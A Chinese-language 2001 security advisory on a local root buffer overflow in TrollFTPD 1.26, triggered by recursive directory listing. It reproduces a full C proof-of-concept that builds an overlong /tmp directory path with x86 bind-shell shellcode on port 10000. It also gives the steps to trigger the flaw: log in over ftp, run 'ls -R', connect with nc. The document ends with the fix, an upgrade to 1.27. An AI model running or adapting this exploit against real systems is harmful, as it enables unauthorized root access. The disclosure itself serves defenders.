TrollFTPD-1.26 存在本地漏洞发布时间:2001-08-14 更新时间:2001-08-14 严重程度:高 威胁程度:本地管理员权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 TrollFTPD 1.26详细描述 TrollFTPD在处理递归目录列表处理中存在错误可以导致一次本地缓冲溢出,获得对ROOT SHELL的访问。 测试代码 offsets需要自己调整) Run the program, ftp localhost <in ftp> (your username) (your password) cd /tmp ls -R <out of ftp> 用 nc 连接10000端口。
/*
 * Proof-of-concept from the 2001 advisory, reproduced as published.
 * What the code visibly does: it creates a chain of directories under
 * /tmp/retroll/ until the path is over 4000 bytes long, then one final
 * directory whose name embeds two hard-coded integers and the byte string
 * below. The advisory attributes the overflow to the daemon's recursive
 * directory listing and says the two integers must be adjusted per target.
 *
 * Defender notes: the fix named by the advisory is TrollFTPD 1.27. The
 * observable artifacts of this PoC are a /tmp/retroll/ tree of nested
 * "AAA.../" directories with a ~4 KB total path, a copy of /bin/sh named
 * UUUUUUUU inside it, and a listener on port 10000 after a user issues
 * "ls -R" (per the advisory's nc step).
 *
 * The per-instruction comments on the byte string are the author's; they
 * are not verified against the bytes here.
 */
char shellcode[] =
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x31\xdb"              // xor ebx, ebx
    "\xf7\xe3"              // mul ebx
    "\xb0\x66"              // mov al, 102
    "\x53"                  // push ebx
    "\x43"                  // inc ebx
    "\x53"                  // push ebx
    "\x43"                  // inc ebx
    "\x53"                  // push ebx
    "\x89\xe1"              // mov ecx, esp
    "\x4b"                  // dec ebx
    "\xcd\x80"              // int 80h
    "\x89\xc7"              // mov edi, eax
    "\x52"                  // push edx
    "\x66\x68\x27\x10"      // push word 4135
    "\x43"                  // inc ebx
    "\x66\x53"              // push bx
    "\x89\xe1"              // mov ecx, esp
    "\xb0\x10"              // mov al, 16
    "\x50"                  // push eax
    "\x51"                  // push ecx
    "\x57"                  // push edi
    "\x89\xe1"              // mov ecx, esp
    "\xb0\x66"              // mov al, 102
    "\xcd\x80"              // int 80h
    "\xb0\x66"              // mov al, 102
    "\xb3\x04"              // mov bl, 4
    "\xcd\x80"              // int 80h
    "\x50"                  // push eax
    "\x50"                  // push eax
    "\x57"                  // push edi
    "\x89\xe1"              // mov ecx, esp
    "\x43"                  // inc ebx
    "\xb0\x66"              // mov al, 102
    "\xcd\x80"              // int 80h
    "\x89\xd9"              // mov ecx, ebx
    "\x89\xc3"              // mov ebx, eax
    "\xb0\x3f"              // mov al, 63
    "\x49"                  // dec ecx
    "\xcd\x80"              // int 80h
    "\x41"                  // inc ecx
    "\xe2\xf8"              // loop lp
    "\x51"                  // push ecx
    "\x68\x55\x55\x55\x55"  // push dword 68732f6eh
    "\x68\x55\x55\x55\x55"  // push dword 69622f2fh
    "\x89\xe3"              // mov ebx, esp
    "\x51"                  // push ecx
    "\x53"                  // push ebx
    "\x89\xe1"              // mov ecx, esp
    "\xb0\x0b"              // mov al, 11
    "\xcd\x80";             // int 80h

/*
 * Entry point. Builds the directory tree described in the header comment.
 * Implicit int return type and no includes: this is pre-C99 style and
 * relies on implicit declarations of strcpy/mkdir/printf/etc.
 */
main()
{
    char dir[8000];
    char nir[8000];
    /* a0/a1 are the hard-coded values the advisory says must be adjusted. */
    int z0 = 0, a0 = 0x080597f8;
    int z1 = 0, a1 = 0xbff96450;
    int g;  /* unused */

    strcpy(dir, "/tmp/retroll/");
    mkdir(dir, 0777);
    printf("%d\n", strlen(shellcode));  /* %d with a size_t: format/argument mismatch */

    /* Append 40-byte components until the path is at least 4040 bytes long. */
    while (strlen(dir) < 4040) {
        strcat(dir, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/");
        mkdir(dir, 0777);
    }
    // 4048 so far leaving 48 left.

    if (chdir(dir)) { perror("chdir"); exit(1); }
    printf("%d + ", strlen(dir));  /* same %d/size_t mismatch as above */

    /* dir is reused as a relative path from here on. */
    sprintf(dir, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAA/");
    mkdir(dir, 0777);
    /* Drops a copy of /bin/sh into the new directory via the shell. */
    system("cp /bin/sh AAAAAAAAAAAAAAAAAAAAAAAAAAAAA/UUUUUUUU");
    sprintf(nir, "%sAAAAAAAAAAAAAAAAAAAAAAAA", dir);
    /*
     * Final component: the addresses of a0 and a1 are passed to %s, so their
     * raw bytes are copied into the name until a zero byte is hit, followed
     * by the byte string above.
     */
    sprintf(dir, "%sGGGG=AAAAAAA%sAAAAAAAAAAAA%sCCCC%s", nir, &a0, &a1, shellcode);
    printf("%d = ", strlen(dir));  /* same %d/size_t mismatch as above */
    mkdir(dir, 0777);
}
解决方案 升级到TrollFTPD-1.27 版本: ftp://ftp.trolltech.com/freebies/ftpd/troll-ftpd-1.27.tar.gz 相关信息 |